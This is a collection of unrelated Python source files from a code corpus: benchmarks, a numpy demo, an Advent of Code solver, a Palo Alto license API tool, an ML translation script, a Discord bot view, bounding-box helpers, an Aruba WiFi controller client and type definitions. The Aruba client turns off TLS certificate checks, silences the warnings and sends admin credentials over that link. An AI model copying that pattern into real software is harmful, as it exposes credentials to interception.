] = calinski_harabasz_score(data, DPU_kmeans.labels_)
df.loc[
dimm_index, ("results", "dpu", "cross_score")
] = adjusted_rand_score(CPU_kmeans.labels_, DPU_kmeans.labels_)
# print(df)
# df.to_csv("benchmarks.csv", index=False)
# important_columns = df.columns[df.nunique() > 1]
# print(important_columns)
# df_readable = df[important_columns]
# df_readable.to_csv("results.csv", index=False)
return df
def experiment_outputs(df: pd.DataFrame) -> None:
"""
Outputs the results of the experiment
"""
# output the entire benchmarks table
df.to_csv("benchmarks.csv", index=False)
# output the important results table
important_input_columns = df.inputs.columns[df.inputs.nunique() > 1]
important_output_columns = [(c[1:]) for c in df.columns if c[2] in ("train_times",)]
df_readable = pd.concat(
(df.inputs[important_input_columns], df.results[important_output_columns]),
axis=1,
)
# df_readable.set_index(important_input_columns.to_list(), inplace=True)
df_readable.columns = ["_".join(col) for col in df_readable.columns.values]
# param_index = "--".join(["_".join(name) for name in df_readable.index.names])
# df_readable.index = df_readable.index.to_flat_index()
# df_readable.index.rename(param_index, inplace=True)
df_readable.to_csv("results.csv", index=False)
if __name__ == "__main__":
df = run_benchmark()
experiment_outputs(df)
|
StarcoderdataPython
|
1604676
|
<reponame>wuljchange/interesting_python
import numpy as np
if __name__ == "__main__":
"""
    Use the numpy module to perform operations on arrays
"""
x = [1, 2, 3, 4]
y = [5, 6, 7, 8]
print(x+y)
print(x*2)
nx = np.array(x)
ny = np.array(y)
print(nx*2)
print(nx+10)
print(nx+ny)
print(np.sqrt(nx))
print(np.cos(nx))
    # 2-D (two-dimensional) array operations
a = np.array([[1, 2, 3], [2, 3, 4]])
# select row 1
print(a[1])
# select column 1
print(a[:, 1])
print(np.where(a > 1, a, 0))
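    # np.where keeps the elements greater than 1 and zeroes out the rest, so
    # for a == [[1, 2, 3], [2, 3, 4]] this prints [[0 2 3], [2 3 4]].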
|
StarcoderdataPython
|
3325490
|
<reponame>zseen/advent-of-code
import unittest
from typing import List
from enum import Enum
from copy import deepcopy
INPUT_FILE = "input.txt"
TEST_INPUT_FILE_LOOP = "test_input_loop.txt"
class Operation(Enum):
JUMP = "jmp"
ACCUMULATE = "acc"
NO_OPERATION = "nop"
class Instruction:
def __init__(self, operation: str, argument: int):
self.operation: str = operation
self.argument: int = argument
class TerminationOutcome:
def __init__(self, accumulatorCount: int, isEndOfInstructionsReached: bool):
self.accumulatorCount: int = accumulatorCount
self.isEndOfInstructionsReached: bool = isEndOfInstructionsReached
def getAccumulatorCountInOneLoop(instructions: List[Instruction]):
return getTerminationConditions(instructions).accumulatorCount
def getTerminationConditions(instructions: List[Instruction]):
accumulatorCount = 0
if not instructions:
raise ValueError("No instructions to follow")
currentInstructionIndex = 0
executedInstructionsInProcess = set()
shouldTerminate = False
while not shouldTerminate:
currentInstruction = instructions[currentInstructionIndex]
if currentInstruction in executedInstructionsInProcess:
break
if currentInstruction.operation == Operation.NO_OPERATION.value:
currentInstructionIndex += 1
elif currentInstruction.operation == Operation.ACCUMULATE.value:
accumulatorCount += currentInstruction.argument
currentInstructionIndex += 1
elif currentInstruction.operation == Operation.JUMP.value:
currentInstructionIndex += currentInstruction.argument
else:
raise ValueError("Unexpected instruction")
executedInstructionsInProcess.add(currentInstruction)
shouldTerminate = currentInstructionIndex == len(instructions)
return TerminationOutcome(accumulatorCount, shouldTerminate)
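# Illustrative sketch (toy program, not the puzzle input): for
# [Instruction("acc", 3), Instruction("jmp", -1)] the accumulator reaches 3 and
# the "jmp" instruction is then revisited, so getTerminationConditions returns
# accumulatorCount == 3 with isEndOfInstructionsReached == False.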
def getAccumulatorCountWithRepairedInstructionProcess(instructions: List[Instruction]):
for i in range(0, len(instructions)):
modifiedInstructions = deepcopy(instructions)
if modifiedInstructions[i].operation == Operation.JUMP.value:
modifiedInstructions[i].operation = Operation.NO_OPERATION.value
elif modifiedInstructions[i].operation == Operation.NO_OPERATION.value:
modifiedInstructions[i].operation = Operation.JUMP.value
else:
continue
terminationState = getTerminationConditions(modifiedInstructions)
if terminationState.isEndOfInstructionsReached:
return terminationState.accumulatorCount
raise ValueError("Could not be repaired.")
def getInput(inputFile):
instructionsLines = []
with open(inputFile, "r") as inputFile:
lines = inputFile.readlines()
for line in lines:
line = line.strip("\n")
line = line.split(" ")
instruction = Instruction(line[0], int(line[1]))
instructionsLines.append(instruction)
return instructionsLines
def main():
instructions = getInput(INPUT_FILE)
accumulatorCountInOneLoop = getAccumulatorCountInOneLoop(instructions)
print(accumulatorCountInOneLoop) # 1594
accumulatorCountIfTerminationRepaired = getAccumulatorCountWithRepairedInstructionProcess(instructions)
print(accumulatorCountIfTerminationRepaired) # 758
class AccumulatorCounter(unittest.TestCase):
def test_getAccumulatorCountInOneLoop_loopingInstructions_correctCountReturned(self):
instructions = getInput(TEST_INPUT_FILE_LOOP)
accumulatorCount = getAccumulatorCountInOneLoop(instructions)
self.assertEqual(5, accumulatorCount)
def test_getAccumulatorCountWithRepairedInstructionProcess_loopingInstructions_correctCountReturned(self):
instructions = getInput(TEST_INPUT_FILE_LOOP)
accumulatorCount = getAccumulatorCountWithRepairedInstructionProcess(instructions)
self.assertEqual(8, accumulatorCount)
if __name__ == '__main__':
# main()
unittest.main()
|
StarcoderdataPython
|
4827130
|
#!/usr/bin/env python
#
# Copyright (c) 2017 Palo Alto Networks, Inc. <<EMAIL>>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
from __future__ import print_function
import getopt
import json
import logging
import os
import pprint
import sys
libpath = os.path.dirname(os.path.abspath(__file__))
sys.path[:0] = [os.path.join(libpath, os.pardir, 'lib')]
import pan.licapi
debug = 0
INDENT = 4 # pprint.pformat()
def main():
options = parse_opts()
if options['debug']:
logger = logging.getLogger()
if options['debug'] == 3:
logger.setLevel(pan.licapi.DEBUG3)
elif options['debug'] == 2:
logger.setLevel(pan.licapi.DEBUG2)
elif options['debug'] == 1:
logger.setLevel(pan.licapi.DEBUG1)
log_format = '%(message)s'
handler = logging.StreamHandler()
formatter = logging.Formatter(log_format)
handler.setFormatter(formatter)
logger.addHandler(handler)
try:
licapi = pan.licapi.PanLicapi(panrc_tag=options['panrc_tag'],
api_key=options['api_key'],
api_version=options['api_version'],
hostname=options['hostname'],
timeout=options['timeout'],
verify_cert=options['ssl'])
except pan.licapi.PanLicapiError as e:
print('pan.licapi.PanLicapi:', e, file=sys.stderr)
sys.exit(1)
if False:
pass
elif options['activate']:
activate(licapi, options)
elif options['deactivate']:
deactivate(licapi, options)
elif options['get']:
get(licapi, options)
sys.exit(0)
def activate(licapi, options):
try:
action = 'activate'
r = licapi.activate(authcode=options['authcode'],
uuid=options['uuid'],
cpuid=options['cpuid'],
serialnumber=options['serial'])
print_status(action, r)
print_response(r, options)
exit_for_http_status(r)
except pan.licapi.PanLicapiError as e:
print_exception(action, e)
sys.exit(1)
if options['key_file'] or options['xml_file']:
write_keys(r, options)
def deactivate(licapi, options):
try:
action = 'deactivate'
r = licapi.deactivate(encryptedtoken=options['token'])
print_status(action, r)
print_response(r, options)
exit_for_http_status(r)
except pan.licapi.PanLicapiError as e:
print_exception(action, e)
sys.exit(1)
def get(licapi, options):
try:
action = 'get'
r = licapi.get(authcode=options['authcode'])
print_status(action, r)
print_response(r, options)
exit_for_http_status(r)
except pan.licapi.PanLicapiError as e:
print_exception(action, e)
sys.exit(1)
def write_keys(r, options):
if r.json is None:
print('No JSON response for write license keys', file=sys.stderr)
sys.exit(1)
if not isinstance(r.json, list):
        print('JSON response not list: %s' %
              pprint.pformat(r.json, indent=INDENT),
              file=sys.stderr)
sys.exit(1)
for key in r.json:
if not ('partidField' in key and 'keyField' in key):
print('Malformed license: %s' %
pprint.pformat(key, indent=INDENT),
file=sys.stderr)
continue
if 'typeField' in key and key['typeField'] == 'SUP':
if debug > 0:
print('Support license skipped',
end='', file=sys.stderr)
if 'feature_descField' in key:
print(': %s' % key['feature_descField'],
end='', file=sys.stderr)
print()
continue
prefix = options['uuid'] if options['uuid'] else options['serial']
files = []
if options['key_file']:
file = prefix + '-' + key['partidField'] + '.key'
if options['dst'] is None:
path = file
else:
path = os.path.join(options['dst'], file)
files.append((path, key['keyField']))
if options['xml_file']:
file = prefix + '-' + key['partidField'] + '.xml'
if options['dst'] is None:
path = file
else:
path = os.path.join(options['dst'], file)
files.append((path, install_xml(key['keyField'])))
for x in files:
if not write_key(*x):
continue
print('%s' % os.path.basename(x[0]), end='')
if 'feature_descField' in key:
print(': %s' % key['feature_descField'])
else:
print()
def write_key(path, x):
try:
f = open(path, 'w')
except IOError as e:
print('open %s: %s' % (path, e), file=sys.stderr)
return False
try:
f.write(x)
except IOError as e:
print('write %s: %s' % (path, e), file=sys.stderr)
return False
finally:
f.close()
return True
def install_xml(x):
document = '''\
<request><license><install>
%s\
</install></license></request>
'''
return document % x
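# Illustrative output: install_xml("KEY") yields
#   <request><license><install>
#   KEY</install></license></request>
# i.e. the license key wrapped in a PAN-OS XML API install request document.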
def print_exception(action, e):
print('%s:' % action, end='', file=sys.stderr)
print(' "%s"' % e, file=sys.stderr)
def print_status(action, r):
print('%s:' % action, end='', file=sys.stderr)
if r.http_code is not None:
print(' %s' % r.http_code, end='', file=sys.stderr)
if r.http_reason is not None:
print(' %s' % r.http_reason, end='', file=sys.stderr)
if r.http_headers is not None:
# XXX
content_type = r.http_headers.get('content-type')
if False and content_type is not None:
print(' %s' % content_type, end='', file=sys.stderr)
length = r.http_headers.get('content-length')
if length is not None:
print(' %s' % length, end='', file=sys.stderr)
print(' %.2fsecs' % r.wall_time, end='', file=sys.stderr)
if r.json is not None:
if 'Message' in r.json:
print(' "%s"' % r.json['Message'],
end='', file=sys.stderr)
print(file=sys.stderr)
def print_response(r, options):
if r.http_text is None:
return
if r.http_content_type is None:
return
if r.http_content_type == 'text/html':
# XXX
print(r.http_text)
elif r.http_content_type == 'application/json':
if options['print_json']:
print_json(r.http_text, isjson=True)
if options['print_python']:
print_python(r.http_text, isjson=True)
def exit_for_http_status(r):
if r.http_code is not None:
if not (200 <= r.http_code < 300):
sys.exit(1)
else:
return
sys.exit(1)
def print_python(obj, isjson=False):
if isjson:
try:
obj = json.loads(obj)
except ValueError as e:
print(e, file=sys.stderr)
print(obj, file=sys.stderr)
sys.exit(1)
print(pprint.pformat(obj, indent=INDENT))
def print_json(obj, isjson=False):
if isjson:
try:
obj = json.loads(obj)
except ValueError as e:
print(e, file=sys.stderr)
print(obj, file=sys.stderr)
sys.exit(1)
print(json.dumps(obj, sort_keys=True, indent=INDENT,
separators=(',', ': ')))
def process_arg(s, list=False):
stdin_char = '-'
if s == stdin_char:
lines = sys.stdin.readlines()
else:
try:
f = open(s)
lines = f.readlines()
f.close()
except IOError:
lines = [s]
if debug > 1:
print('lines:', lines, file=sys.stderr)
if list:
l = [x.rstrip('\r\n') for x in lines]
return l
lines = ''.join(lines)
return lines
def parse_opts():
options = {
'activate': False,
'deactivate': False,
'get': False,
'authcode': None,
'cpuid': None,
'uuid': None,
'token': None,
'serial': None,
'key_file': False,
'xml_file': False,
'dst': None,
'api_key': None,
'api_version': None,
'hostname': None,
'ssl': True,
'print_python': False,
'print_json': False,
'debug': 0,
'panrc_tag': None,
'timeout': None,
}
short_options = 'K:V:h:pjDt:T:kx'
long_options = [
'activate', 'deactivate', 'get', 'authcode=',
'cpuid=', 'uuid=', 'token=', 'serial=', 'dst=',
'ssl=',
'version', 'help',
]
try:
opts, args = getopt.getopt(sys.argv[1:],
short_options,
long_options)
except getopt.GetoptError as error:
print(error, file=sys.stderr)
sys.exit(1)
for opt, arg in opts:
if False:
pass
elif opt == '--activate':
options['activate'] = True
elif opt == '--deactivate':
options['deactivate'] = True
elif opt == '--get':
options['get'] = True
elif opt == '--authcode':
options['authcode'] = arg
elif opt == '--cpuid':
options['cpuid'] = arg
elif opt == '--uuid':
options['uuid'] = arg
elif opt == '--token':
options['token'] = process_arg(arg)
elif opt == '--serial':
options['serial'] = arg
elif opt == '-k':
options['key_file'] = True
elif opt == '-x':
options['xml_file'] = True
elif opt == '--dst':
if not os.path.isdir(arg):
print('Invalid --dst: %s' % arg, file=sys.stderr)
sys.exit(1)
options['dst'] = arg
elif opt == '-K':
options['api_key'] = arg
elif opt == '-V':
options['api_version'] = arg
elif opt == '-h':
options['hostname'] = arg
elif opt == '--ssl':
if arg in ['verify', 'noverify']:
if arg == 'noverify':
options['ssl'] = False
elif arg == 'verify':
options['ssl'] = True
else:
print('Invalid --ssl option:', arg)
sys.exit(1)
elif opt == '-p':
options['print_python'] = True
elif opt == '-j':
options['print_json'] = True
elif opt == '-D':
if not options['debug'] < 3:
print('Maximum debug level is 3', file=sys.stderr)
sys.exit(1)
global debug
debug += 1
options['debug'] = debug
elif opt == '-t':
if arg:
options['panrc_tag'] = arg
elif opt == '-T':
options['timeout'] = arg
elif opt == '--version':
print('pan-python', pan.licapi.__version__)
sys.exit(0)
elif opt == '--help':
usage()
sys.exit(0)
else:
assert False, 'unhandled option %s' % opt
if len(args) > 0:
print('Extra options:', args, file=sys.stderr)
sys.exit(1)
if options['debug'] > 2:
s = pprint.pformat(options, indent=INDENT)
print(s, file=sys.stderr)
return options
def usage():
usage = '''%s [options]
--activate activate VM license
--deactivate deactivate VM license
--get get quantity of VM provisioned
--authcode code license auth code
--cpuid id VM-Series vm-cpuid
--uuid id VM-Series vm-uuid
--token token deactivate license token
--serial serial get licenses for serial number
-k write license key files
-x write license install PAN-OS XML API documents
--dst dir destination directory for keys (default .)
-t tag .panrc tagname
-K api_key license API key
-V api_version license API version (default %s)
-h hostname license hostname
-p print JSON response in Python to stdout
-j print JSON to stdout
-D enable debug (multiple up to -DDD)
--ssl opt SSL verify option: verify|noverify
-T seconds HTTP connect timeout
--version display version
--help display usage
'''
print(usage % (os.path.basename(sys.argv[0]),
pan.licapi.DEFAULT_API_VERSION), end='')
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3202827
|
import logging.config
def configure_logger(level: str = "INFO") -> None:
logging.config.dictConfig(
{
"version": 1,
"formatters": {
"colored": {
"()": "colorlog.ColoredFormatter",
"format": "%(log_color)s%(message)s%(reset)s",
}
},
"handlers": {
"termcolor": {
"level": level,
"formatter": "colored",
"class": "logging.StreamHandler",
"stream": "ext://sys.stdout",
}
},
"loggers": {"qwikstart": {"level": level, "handlers": ["termcolor"]}},
}
)
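# Minimal usage sketch (assumes only the "qwikstart" logger configured above;
# "import logging.config" also binds the top-level "logging" name):
if __name__ == "__main__":
    configure_logger("DEBUG")
    logging.getLogger("qwikstart").debug("colored debug output on stdout")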
|
StarcoderdataPython
|
121297
|
from torchtext import data
from torch.utils.data import DataLoader
from graph import MTInferBatcher, get_mt_dataset, MTDataset, DocumentMTDataset
from modules import make_translate_infer_model
from utils import tensor_to_sequence, average_model
import torch as th
import argparse
import yaml
max_length = 1024
def run(dev_id, config):
_dataset = config['dataset']
if _dataset == 'iwslt':
TEXT = [data.Field(batch_first=True) for _ in range(2)]
dataset = get_mt_dataset('iwslt')
_, _, test = dataset.splits(exts=('.tc.zh', '.tc.en'), fields=TEXT, root='./data')
test = DocumentMTDataset(test, context_length=config['context_len'])
vocab_zh, vocab_en = dataset.load_vocab(root='./data')
print('vocab size: ', len(vocab_zh), len(vocab_en))
vocab_sizes = [len(vocab_zh), len(vocab_en)]
TEXT[0].vocab = vocab_zh
TEXT[1].vocab = vocab_en
batcher = MTInferBatcher(TEXT, config['doc_max_len'], test.BOS_TOKEN,
graph_type=config['graph_type'], **config.get('graph_attrs', {}))
test_loader = DataLoader(dataset=test,
batch_size=config['test_batch_size'],
collate_fn=batcher,
shuffle=False)
elif _dataset == 'wmt':
TEXT = data.Field(batch_first=True)
dataset = get_mt_dataset('wmt14')
_, _, test = dataset.splits(exts=['.en', '.de'], fields=[TEXT, TEXT], root='./data')
test = MTDataset(test)
vocab = dataset.load_vocab(root='./data')[0]
print('vocab size: ', len(vocab))
vocab_sizes = [len(vocab)]
TEXT.vocab = vocab
batcher = MTInferBatcher(TEXT, config['doc_max_len'], test.BOS_TOKEN,
graph_type=config['graph_type'], **config.get('graph_attrs', {}))
test_loader = DataLoader(dataset=test,
batch_size=config['test_batch_size'],
collate_fn=batcher,
shuffle=False)
elif _dataset == 'multi':
TEXT = [data.Field(batch_first=True) for _ in range(2)]
dataset = get_mt_dataset('multi30k')
_, _, test = dataset.splits(exts=['.en.atok', '.de.atok'], fields=TEXT, root='./data')
test = MTDataset(test)
vocab_en, vocab_de = dataset.load_vocab(root='./data')
print('vocab size: ', len(vocab_en), len(vocab_de))
vocab_sizes = [len(vocab_en), len(vocab_de)]
TEXT[0].vocab = vocab_en
TEXT[1].vocab = vocab_de
batcher = MTInferBatcher(TEXT, config['doc_max_len'], test.BOS_TOKEN,
graph_type=config['graph_type'], **config.get('graph_attrs', {}))
test_loader = DataLoader(dataset=test,
batch_size=config['test_batch_size'],
collate_fn=batcher,
shuffle=False)
dim_model = config['dim_model']
dim_ff = config['dim_ff']
num_heads = config['num_heads']
n_layers = config['n_layers']
m_layers = config['m_layers']
dropouti = config['dropouti']
dropouth = config['dropouth']
dropouta = config['dropouta']
dropoutc = config['dropoutc']
rel_pos = config['rel_pos']
model = make_translate_infer_model(vocab_sizes, dim_model, dim_ff, num_heads,
n_layers, m_layers,
dropouti=dropouti, dropouth=dropouth,
dropouta=dropouta, dropoutc=dropoutc,
rel_pos=rel_pos)
device = th.device(dev_id)
model.load_state_dict(
average_model(['{}-{}.pkl'.format(epoch, config['save_name']) for epoch in range(config['n_epochs'] - 5, config['n_epochs'])]))
model = model.to(device)
model.eval()
if _dataset == 'iwslt':
vocab_trg = vocab_en
elif _dataset == 'wmt':
vocab_trg = vocab
elif _dataset == 'multi':
vocab_trg = vocab_de
for batch in test_loader:
with th.no_grad():
batch.g_enc.edata['etype'] = batch.g_enc.edata['etype'].to(device)
batch.g_enc.ndata['pos'] = batch.g_enc.ndata['pos'].to(device)
batch.g_enc.ndata['x'] = batch.g_enc.ndata['x'].to(device)
for j in range(batcher.k):
batch.g_dec[j].edata['etype'] = batch.g_dec[j].edata['etype'].to(device)
batch.g_dec[j].ndata['pos'] = batch.g_dec[j].ndata['pos'].to(device)
batch.g_dec[j].ndata['x'] = batch.g_dec[j].ndata['x'].to(device)
output = model(batch, vocab_trg.stoi[MTDataset.EOS_TOKEN], sent_max_len=config['sent_max_len'])
for sequence in tensor_to_sequence(vocab_trg.itos, output, batch.n_sent_ctx):
print(sequence)
if __name__ == '__main__':
argparser = argparse.ArgumentParser("machine translation inference")
argparser.add_argument('--config', type=str)
argparser.add_argument('--gpu', type=int, default=0)
args = argparser.parse_args()
with open(args.config, 'r') as f:
        config = yaml.load(f, Loader=yaml.FullLoader)
run(args.gpu, config)
|
StarcoderdataPython
|
1672418
|
#! python3
# factorialLog.py - Learning how to log program events
import logging, os
os.chdir('S:\\Documents\\GitHub\\ATBS\\Chapter_10')
#logging.disable(logging.DEBUG)
logging.basicConfig(filename='myProgramLog.txt', level=logging.DEBUG, format=' %(asctime)s - %(levelname)s - %(message)s')
logging.debug('Start of program')
def factorial(n):
logging.debug('Start of factorial(%s)' % (n))
total = 1
# Fixed bug of i starting from 0
for i in range(1, n + 1):
total *= i
logging.debug('i is ' + str(i) + ', total is ' + str(total))
logging.debug('End of factorial(%s)' % (n))
return total
print(factorial(5))
logging.debug('End of program')
|
StarcoderdataPython
|
1795688
|
<gh_stars>1-10
# Imports
import nextcord, json
from nextcord.ext import commands
from nextcord.ui import View, Select, button
from Functions.Embed import *
# Load Options.json as a dict
with open('Settings/Options.json') as Settings:
Options = json.load(Settings)
# Button array for the main help command embed
class HelpView(View):
def __init__(self, ctx:commands.Context):
super().__init__(timeout = 30)
self.ctx = ctx
self.add_item(nextcord.ui.Button(label = "Invite Me", url = Options['InviteLink']))
self.add_item(nextcord.ui.Button(label = "Website", url = Options['Website']))
@button(label = '🗑️', style = nextcord.ButtonStyle.red)
async def delete(self, button: nextcord.ui.Button, interaction: nextcord.Interaction):
"""Delete the interaction"""
await interaction.message.delete()
await self.ctx.message.delete()
async def on_timeout(self):
"""Disable all interactions on timeout"""
try:
for child in self.children:
child.disabled = True
await self.response.edit(view = self)
except: pass
async def interaction_check(self, interaction: nextcord.Interaction):
"""Make it so that only the author can use the interactions"""
return interaction.user.id == self.ctx.author.id
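# Usage sketch (hypothetical help command, not part of this cog): the sent
# message is stored on the view so on_timeout() can disable its buttons, e.g.
#   view = HelpView(ctx)
#   view.response = await ctx.send(embed=help_embed, view=view)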
|
StarcoderdataPython
|
3286262
|
from hive.envs.marlgrid import ma_envs
from hive.envs.marlgrid.marlgrid import MarlGridEnv
|
StarcoderdataPython
|
35573
|
import numpy as np
class BoundBox:
"""
Adopted from https://github.com/thtrieu/darkflow/blob/master/darkflow/utils/box.py
"""
def __init__(self, obj_prob, probs=None, box_coord=[float() for i in range(4)]):
self.x, self.y = float(box_coord[0]), float(box_coord[1])
self.w, self.h = float(box_coord[2]), float(box_coord[3])
self.c = 0.
self.obj_prob = obj_prob
self.class_probs = None if probs is None else np.array(probs)
def get_score(self):
return max(self.class_probs)
def get_classindex(self):
return np.argmax(self.class_probs) # class_index = np.argmax(box.classes)
def get_coordinates(self):
return self.x, self.y, self.w, self.h
def overlap(x1, w1, x2, w2):
l1 = x1 - w1 / 2.
l2 = x2 - w2 / 2.
left = max(l1, l2)
r1 = x1 + w1 / 2.
r2 = x2 + w2 / 2.
right = min(r1, r2)
return right - left
def box_intersection(a, b):
w = overlap(a.x, a.w, b.x, b.w)
h = overlap(a.y, a.h, b.y, b.h)
    if w < 0 or h < 0: return 0
area = w * h
return area
def box_union(a, b):
i = box_intersection(a, b)
u = a.w * a.h + b.w * b.h - i
return u
def box_iou(a, b):
# Box intersect over union.
return box_intersection(a, b) / box_union(a, b)
def prob_compare(box):
return box.probs[box.class_num]
def prob_compare2(boxa, boxb):
if (boxa.pi < boxb.pi):
return 1
elif (boxa.pi == boxb.pi):
return 0
else:
return -1
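# Small self-check sketch (illustrative only, not part of the original darkflow
# utilities): two unit squares whose centres are offset by (0.5, 0.5) overlap
# in a 0.5 x 0.5 patch, so IoU = 0.25 / (1 + 1 - 0.25) = 1/7.
if __name__ == "__main__":
    _a = BoundBox(1.0, box_coord=[0.5, 0.5, 1.0, 1.0])
    _b = BoundBox(1.0, box_coord=[1.0, 1.0, 1.0, 1.0])
    assert abs(box_iou(_a, _b) - 1.0 / 7.0) < 1e-9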
|
StarcoderdataPython
|
1639393
|
<filename>wifinator/aruba.py<gh_stars>0
#!/usr/bin/python3 -tt
# -*- coding: utf-8 -*-
import re
from threading import Lock
from requests import Session, HTTPError
from time import time
from xml.etree.ElementTree import XML, ParseError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.packages.urllib3 import disable_warnings
disable_warnings(InsecureRequestWarning)
class ArubaError(Exception):
"""Generic error related to communication with Aruba WiFi controllers."""
class Aruba(object):
# <url> ? command @@ timestamp & UIDARUBA=session-id
COMMAND_URL = 'https://{host}:4343/screens/cmnutil/execCommandReturnResult.xml'
# POST opcode, url, needxml, uid, passwd
LOGIN_URL = 'https://{host}:4343/screens/wms/wms.login'
def __init__(self, host, username, password):
"""Store address and credentials for later."""
self.host = host
self.username = username
self.password = password
self.session = Session()
self.login_url = self.LOGIN_URL.format(host=host)
self.command_url = self.COMMAND_URL.format(host=host)
def request(self, command):
s = self.session.cookies.get('SESSION', '')
p = '{0}@@{1}&UIDARUBA={2}'.format(command, int(time()), s)
r = self.session.get(self.command_url, verify=False, params=p)
# The controller shamelessly retains ASCII control characters and
# some users are able to inject them through their login names.
data = re.sub(b'[\x00-\x09\x11-\x12\x14-\x1f]',
lambda m: ('\\x%.2x' % m.group(0)[0]).encode('utf8'),
r.text.encode('utf8', 'xmlcharrefreplace'))
if data:
try:
return XML(data)
except ParseError:
raise ArubaError('Response is not a valid XML element')
def request_table(self, command):
r = self.request(command)
if r.find('t') is None:
raise ArubaError('Response does not contain a table')
return [[(c.text.strip() if c.text is not None else '') for c in row] \
for row in r.find('t')[1:]]
def request_dict(self, command):
return {row[0]: row[1] for row in self.request_table(command)}
def login(self):
if self.request('show roleinfo').find('data'):
return
r = self.session.post(self.login_url, verify=False, data={
'opcode': 'login',
'url': '/',
'needxml': '0',
'uid': self.username,
            'passwd': self.password,
})
if 'Authentication complete' not in r.text:
raise ArubaError('Login failed')
def list_profiles(self):
"""List service profiles with SSID and Beacon settings."""
profiles = {}
for name in self.request_dict('show wlan ssid-profile'):
detail = self.request_dict('show wlan ssid-profile ' + name)
profiles[name] = {
'ssid': detail['ESSID'],
'active': detail['SSID enable'] == 'Enabled',
}
return profiles
def list_stations(self):
"""List client stations with MAC addresses and more."""
stations = {}
r = self.request_table('show station-table')
for mac, name, role, age, auth, ap, essid, phy, remote, profile in r:
stations[mac] = {
'mac': mac,
'name': name,
'role': role,
'age': age,
'auth': auth,
'ap': ap,
'essid': essid,
'phy': phy,
'remote': remote,
'profile': profile,
}
return stations
def essid_stats(self):
stats = {}
for station in self.list_stations().values():
essid = station['essid']
stats.setdefault(essid, 0)
stats[essid] += 1
return stats
def ap_stats(self):
stats = {}
for station in self.list_stations().values():
ap = station['ap']
stats.setdefault(ap, 0)
stats[ap] += 1
return stats
def edit_profile(self, profile, ssid, psk, active):
"""Adjust service profile. PSK is in plain text."""
self.request('wlan ssid-profile {0} essid {1}'.format(profile, ssid))
self.request('wlan ssid-profile {0} wpa-passphrase {1}'.format(profile, psk))
if active:
self.request('wlan ssid-profile {0} ssid-enable'.format(profile))
else:
self.request('wlan ssid-profile {0} no ssid-enable'.format(profile))
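# Usage sketch (hypothetical controller address and credentials):
#   aruba = Aruba("wifi-ctrl.example.com", "admin", "secret")
#   aruba.login()
#   aruba.edit_profile("guest-profile", ssid="Guest", psk="changeme", active=True)
#   print(aruba.essid_stats())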
# vim:set sw=4 ts=4 et:
|
StarcoderdataPython
|
53271
|
import enum
import time
from collections import namedtuple
from dataclasses import dataclass, field
from typing import List, Dict, Any, Union, Tuple, Sequence, Callable, Optional
import gym
import numpy as np
from malib.utils.notations import deprecated
""" Rename and definition of basic data types which are correspond to the inputs (args, kwargs) """
PolicyConfig = Dict[str, Any]
MetaPolicyConfig = Tuple[gym.spaces.Space, gym.spaces.Space, Sequence[PolicyConfig]]
EnvConfig = Dict[str, Any]
RolloutConfig = Dict[str, Any]
ParameterLibConfig = Dict[str, Any]
DatasetConfig = Dict[str, Any]
TrainingConfig = Dict[str, Any]
ModelConfig = Dict[str, Any]
AgentConfig = Dict[str, TrainingConfig]
AgentID = str
PolicyID = str
EnvID = str
EpisodeID = str
DataBlockID = str
DataTransferType = np.ndarray
EnvObservationType = Any
# next_observation, rewards, done, infos
StandardEnvReturns = Tuple[
Dict[str, DataTransferType],
Dict[str, float],
Dict[str, bool],
Dict[str, Any],
]
# TODO(ming): mute info temporally to avoid data transferring errors
StandardTransition = namedtuple(
# "StandardTransition", "obs, new_obs, action, reward, done, info"
"StandardTransition",
"obs, new_obs, actions, rewards, dones",
)
ObservationSpaceType = gym.spaces.Space
ActionSpaceType = gym.spaces.Space
""" For task categorical and status tagging """
class TaskType(enum.Enum):
ASYNC_LEARNING = "async_learning"
ADD_WORKER = "add_worker"
SAVE_MODEL = "save_model"
LOAD_MODEL = "load_model"
OPTIMIZE = "optimization"
ROLLOUT = "rollout"
UPDATE_PARAMETER = "update_PARAMETER"
PULL_PARAMETER = "pull_parameter"
PUSH_PARAMETER = "push_parameter"
SAMPLE_BATCH = "sample_batch"
PUSH_SAMPLES = "push_samples"
NO = "no"
TRAINING_EVALUATE = "evaluate_for_training"
ROLLOUT_EVALUATE = "evaluate_for_rollouts"
ADD_POLICY = "add_policy"
UPDATE_POPULATION = "update_population"
EVALUATE = "evaluate"
EVALUATE_WRITE_BACK = "evaluate_write_back"
INIT = "initialization"
CHECK_ADD = "check_add"
TERMINATE = "terminate"
SIMULATION = "simulation"
UPDATE_PAYOFFTABLE = "update_payofftable"
class Status(enum.Enum):
TERMINATE = "terminate"
NORMAL = "normal"
LOCKED = "locked"
WAITING = "waiting"
SUCCESS = "success"
IDLE = "idle"
IN_PROGRESS = "in progress"
EXCEED = "exceed"
FAILED = "failed"
class Paradigm(enum.Enum):
MARL = "marl"
META_GAME = "meta_game"
class BehaviorMode(enum.IntEnum):
"""Behavior mode, indicates environment agent behavior"""
EXPLORATION = 0
"""Trigger exploration mode"""
EXPLOITATION = 1
"""Trigger exploitation mode"""
class MetricType:
REWARD = "reward"
"""Reward"""
LIVE_STEP = "live_step"
"""Agent live step"""
REACH_MAX_STEP = "reach_max_step"
"""Whether reach max step or not"""
Parameter = Any
""" Description: """
@dataclass
class ParameterDescription:
class Type:
PARAMETER = "parameter"
GRADIENT = "gradient"
time_stamp: float
identify: str # meta policy id
env_id: str
id: PolicyID
type: str = Type.PARAMETER
lock: bool = False
description: Any = None
data: Parameter = None
parallel_num: int = 1
version: int = -1
@classmethod
def gen_template(cls, **kwargs):
return cls(
time_stamp=time.time(),
